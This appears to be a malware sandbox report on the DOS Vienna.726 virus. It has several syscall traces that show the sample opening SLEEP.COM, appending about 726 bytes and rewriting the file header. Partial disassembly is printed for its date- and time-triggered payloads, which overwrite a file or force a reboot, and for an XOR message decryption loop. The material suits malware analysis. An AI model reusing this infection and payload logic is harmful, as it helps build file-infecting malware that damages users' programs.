Sample viewer

vx.netlux.org/Virus.DOS.Vienna.726

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:38:25.721741252Z 47 PC: 12e23 | Get disk transfer address
2018-12-17T22:38:25.724248318Z 26 PC: 12e32 | Set disk transfer address
2018-12-17T22:38:25.725669652Z 78 PC: 12eb0 | Find first file
2018-12-17T22:38:25.730300807Z 67 PC: 12eeb | Get or set file attributes
2018-12-17T22:38:25.73431541Z 67 PC: 12efc | Get or set file attributes
2018-12-17T22:38:26.731080405Z 61 PC: 12f06 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:38:26.738586205Z 87 PC: 12f12 | Get or set file date and time
2018-12-17T22:38:26.740137717Z 42 PC: 12f1c | Get date
0x12f1c: cmp cx, 0x7c5
0x12f20: ja 0x12f27
0x12f22: cmp dh, 9
0x12f25: jbe 0x12f57
0x12f27: mov ah, 0x2c
0x12f29: int 0x21
0x12f2b: and dh, 7
0x12f2e: jne 0x12f40
0x12f30: mov ah, 0x40
0x12f32: mov cx, 5
0x12f35: mov dx, si
0x12f37: add dx, 0xda
0x12f3b: int 0x21
0x12f3d: jmp 0x12fe7
0x12f40: and dh, 9
0x12f43: jne 0x12f57
0x12f45: xor ax, ax
0x12f47: mov ds, ax
0x12f49: and word ptr [0x410], 0xff3f
0x12f4f: mov word ptr [0x413], 0x100
2018-12-17T22:38:26.742745689Z 44 PC: 12f2b | Get time
0x12f2b: and dh, 7
0x12f2e: jne 0x12f40
0x12f30: mov ah, 0x40
0x12f32: mov cx, 5
0x12f35: mov dx, si
0x12f37: add dx, 0xda
0x12f3b: int 0x21
0x12f3d: jmp 0x12fe7
0x12f40: and dh, 9
0x12f43: jne 0x12f57
0x12f45: xor ax, ax
0x12f47: mov ds, ax
0x12f49: and word ptr [0x410], 0xff3f
0x12f4f: mov word ptr [0x413], 0x100
0x12f55: int 0x19
0x12f57: mov word ptr [si + 0x10], 0
0x12f5c: lea di, word ptr [si + 0x5f]
0x12f5f: mov cx, 0x2b
0x12f62: xor al, al
0x12f64: rep stosb byte ptr es:[di], al
2018-12-17T22:38:26.74552209Z 63 PC: 12f72 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:38:26.752868415Z 66 PC: 12f84 | Move file pointer
2018-12-17T22:38:26.755625318Z 64 PC: 12fa7 | Write file or device (Write 726 bytes on handle 5)
2018-12-17T22:38:26.765688356Z 66 PC: 12fb9 | Move file pointer
2018-12-17T22:38:26.768093912Z 64 PC: 12fc7 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:38:26.776885736Z 87 PC: 12fd6 | Get or set file date and time
2018-12-17T22:38:26.778776921Z 62 PC: 12fda | Close file
2018-12-17T22:38:26.787928852Z 67 PC: 12fe7 | Get or set file attributes
2018-12-17T22:38:26.799075903Z 26 PC: 12ff2 | Set disk transfer address
2018-12-17T22:38:26.800566571Z 9 PC: 12caf | Display string (String= '���D')
2018-12-17T22:38:26.805204572Z 9 PC: 12cb6 | Display string (String= '����t�H^���z���� ��������;')
2018-12-17T22:38:26.822372195Z 76 PC: 12c19 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":6573,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:59:53.944893425Z 47 PC: 12e23 | Get disk transfer address
2018-12-25T11:59:53.946717376Z 26 PC: 12e32 | Set disk transfer address
2018-12-25T11:59:53.948802944Z 78 PC: 12eb0 | Find first file
2018-12-25T11:59:53.955376295Z 67 PC: 12eeb | Get or set file attributes
2018-12-25T11:59:53.962124499Z 67 PC: 12efc | Get or set file attributes
2018-12-25T11:59:54.876172399Z 61 PC: 12f06 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:59:54.890275659Z 87 PC: 12f12 | Get or set file date and time
2018-12-25T11:59:54.892591705Z 42 PC: 12f1c | Get date
0x12f1c: cmp cx, 0x7c5
0x12f20: ja 0x12f27
0x12f22: cmp dh, 9
0x12f25: jbe 0x12f57
0x12f27: mov ah, 0x2c
0x12f29: int 0x21
0x12f2b: and dh, 7
0x12f2e: jne 0x12f40
0x12f30: mov ah, 0x40
0x12f32: mov cx, 5
0x12f35: mov dx, si
0x12f37: add dx, 0xda
0x12f3b: int 0x21
0x12f3d: jmp 0x12fe7
0x12f40: and dh, 9
0x12f43: jne 0x12f57
0x12f45: xor ax, ax
0x12f47: mov ds, ax
0x12f49: and word ptr [0x410], 0xff3f
0x12f4f: mov word ptr [0x413], 0x100
2018-12-25T11:59:54.899111245Z 63 PC: 12f72 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:59:54.908687319Z 66 PC: 12f84 | Move file pointer
2018-12-25T11:59:54.913585936Z 64 PC: 12fa7 | Write file or device (Write 726 bytes on handle 5)
2018-12-25T11:59:54.928779925Z 66 PC: 12fb9 | Move file pointer
2018-12-25T11:59:54.933865552Z 64 PC: 12fc7 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:59:54.955562556Z 87 PC: 12fd6 | Get or set file date and time
2018-12-25T11:59:54.958442953Z 62 PC: 12fda | Close file
2018-12-25T11:59:54.967266031Z 67 PC: 12fe7 | Get or set file attributes
2018-12-25T11:59:54.978551313Z 26 PC: 12ff2 | Set disk transfer address
2018-12-25T11:59:54.982571635Z 9 PC: 12caf | Display string (String= '���D')
2018-12-25T11:59:54.989148864Z 9 PC: 12cb6 | Display string (String= '����t�H^���z���� ��������;')
2018-12-25T11:59:55.007110954Z 76 PC: 12c19 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":6573,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:59:54.282803863Z 47 PC: 12e23 | Get disk transfer address
2018-12-25T11:59:54.285075891Z 26 PC: 12e32 | Set disk transfer address
2018-12-25T11:59:54.286575752Z 78 PC: 12eb0 | Find first file
2018-12-25T11:59:54.293111714Z 67 PC: 12eeb | Get or set file attributes
2018-12-25T11:59:54.299977821Z 67 PC: 12efc | Get or set file attributes
2018-12-25T11:59:54.317555879Z 61 PC: 12f06 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:59:54.324686109Z 87 PC: 12f12 | Get or set file date and time
2018-12-25T11:59:54.326900582Z 42 PC: 12f1c | Get date
0x12f1c: cmp cx, 0x7c5
0x12f20: ja 0x12f27
0x12f22: cmp dh, 9
0x12f25: jbe 0x12f57
0x12f27: mov ah, 0x2c
0x12f29: int 0x21
0x12f2b: and dh, 7
0x12f2e: jne 0x12f40
0x12f30: mov ah, 0x40
0x12f32: mov cx, 5
0x12f35: mov dx, si
0x12f37: add dx, 0xda
0x12f3b: int 0x21
0x12f3d: jmp 0x12fe7
0x12f40: and dh, 9
0x12f43: jne 0x12f57
0x12f45: xor ax, ax
0x12f47: mov ds, ax
0x12f49: and word ptr [0x410], 0xff3f
0x12f4f: mov word ptr [0x413], 0x100
2018-12-25T11:59:54.329128969Z 63 PC: 12f72 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:59:54.335367217Z 66 PC: 12f84 | Move file pointer
2018-12-25T11:59:54.33697751Z 64 PC: 12fa7 | Write file or device (Write 726 bytes on handle 5)
2018-12-25T11:59:54.345745341Z 66 PC: 12fb9 | Move file pointer
2018-12-25T11:59:54.347236609Z 64 PC: 12fc7 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:59:54.353619867Z 87 PC: 12fd6 | Get or set file date and time
2018-12-25T11:59:54.355824659Z 62 PC: 12fda | Close file
2018-12-25T11:59:54.363822586Z 67 PC: 12fe7 | Get or set file attributes
2018-12-25T11:59:54.373551121Z 26 PC: 12ff2 | Set disk transfer address
2018-12-25T11:59:54.375570403Z 9 PC: 12caf | Display string (String= '���D')
2018-12-25T11:59:54.380916619Z 9 PC: 12cb6 | Display string (String= '����t�H^���z���� ��������;')
2018-12-25T11:59:54.3960216Z 76 PC: 12c19 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":7,"TimeBased":true,"OriginalID":6573,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:59:54.480291058Z 47 PC: 12e23 | Get disk transfer address
2018-12-25T11:59:54.482606565Z 26 PC: 12e32 | Set disk transfer address
2018-12-25T11:59:54.484970059Z 78 PC: 12eb0 | Find first file
2018-12-25T11:59:54.492736185Z 67 PC: 12eeb | Get or set file attributes
2018-12-25T11:59:54.499104486Z 67 PC: 12efc | Get or set file attributes
2018-12-25T11:59:54.875805587Z 61 PC: 12f06 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:59:54.890843655Z 87 PC: 12f12 | Get or set file date and time
2018-12-25T11:59:54.892774757Z 42 PC: 12f1c | Get date
0x12f1c: cmp cx, 0x7c5
0x12f20: ja 0x12f27
0x12f22: cmp dh, 9
0x12f25: jbe 0x12f57
0x12f27: mov ah, 0x2c
0x12f29: int 0x21
0x12f2b: and dh, 7
0x12f2e: jne 0x12f40
0x12f30: mov ah, 0x40
0x12f32: mov cx, 5
0x12f35: mov dx, si
0x12f37: add dx, 0xda
0x12f3b: int 0x21
0x12f3d: jmp 0x12fe7
0x12f40: and dh, 9
0x12f43: jne 0x12f57
0x12f45: xor ax, ax
0x12f47: mov ds, ax
0x12f49: and word ptr [0x410], 0xff3f
0x12f4f: mov word ptr [0x413], 0x100
2018-12-25T11:59:54.897131556Z 63 PC: 12f72 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:59:54.904766045Z 66 PC: 12f84 | Move file pointer
2018-12-25T11:59:54.906770535Z 64 PC: 12fa7 | Write file or device (Write 726 bytes on handle 5)
2018-12-25T11:59:54.917718895Z 66 PC: 12fb9 | Move file pointer
2018-12-25T11:59:54.919700311Z 64 PC: 12fc7 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:59:54.927428214Z 87 PC: 12fd6 | Get or set file date and time
2018-12-25T11:59:54.930294195Z 62 PC: 12fda | Close file
2018-12-25T11:59:54.939116092Z 67 PC: 12fe7 | Get or set file attributes
2018-12-25T11:59:54.950387531Z 26 PC: 12ff2 | Set disk transfer address
2018-12-25T11:59:54.952219687Z 9 PC: 12caf | Display string (String= '���D')
2018-12-25T11:59:54.959818337Z 9 PC: 12cb6 | Display string (String= '����t�H^���z���� ��������;')
2018-12-25T11:59:54.977050166Z 76 PC: 12c19 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":7,"TimeBased":true,"OriginalID":6573,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:59:54.566887122Z 26 PC: 12a83 | Set disk transfer address
2018-12-25T11:59:54.569028957Z 78 PC: 12a8e | Find first file
2018-12-25T11:59:54.57555098Z 67 PC: 12a9c | Get or set file attributes
2018-12-25T11:59:54.581177185Z 67 PC: 12aac | Get or set file attributes
2018-12-25T11:59:54.606964726Z 61 PC: 12abd | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:59:54.614360693Z 63 PC: 12ad7 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:59:54.622231785Z 66 PC: 12b1e | Move file pointer
2018-12-25T11:59:54.623812575Z 64 PC: 12b29 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:59:54.631275972Z 66 PC: 12b32 | Move file pointer
2018-12-25T11:59:54.632597154Z 64 PC: 12b3d | Write file or device (Write 721 bytes on handle 5)
2018-12-25T11:59:54.641127313Z 87 PC: 12b4a | Get or set file date and time
2018-12-25T11:59:54.646731976Z 62 PC: 12b4e | Close file
2018-12-25T11:59:54.654215539Z 67 PC: 12b5d | Get or set file attributes
2018-12-25T11:59:54.664289091Z 42 PC: 12b61 | Get date
0x12b61: cmp dl, 1
0x12b64: jne 0x12b8e
0x12b66: mov cx, 0x131
0x12b69: lea di, word ptr [bp + 0x2a9]
0x12b6d: xor ax, ax
0x12b6f: mov ah, byte ptr [bp + 0x3db]
0x12b73: inc di
0x12b74: mov al, byte ptr [di]
0x12b76: xor al, ah
0x12b78: mov byte ptr [di], al
0x12b7a: loop 0x12b73
0x12b7c: mov ah, 9
0x12b7e: lea dx, word ptr [bp + 0x2aa]
0x12b82: int 0x21
0x12b84: lea dx, word ptr [bp + 0x3bc]
0x12b88: int 0x21
0x12b8a: mov ah, 8
0x12b8c: int 0x21
0x12b8e: cmp word ptr [0x100], 0x1f0e
0x12b94: jne 0x12b9a
2018-12-25T11:59:54.66784124Z 9 PC: 12b84 | Display string (Could not find end pointer)
2018-12-25T11:59:54.684384111Z 9 PC: 12b8a | Display string (String= ' Punch a key to continue... ')
2018-12-25T11:59:54.69077674Z 8 PC: 12b8e | Console input without echo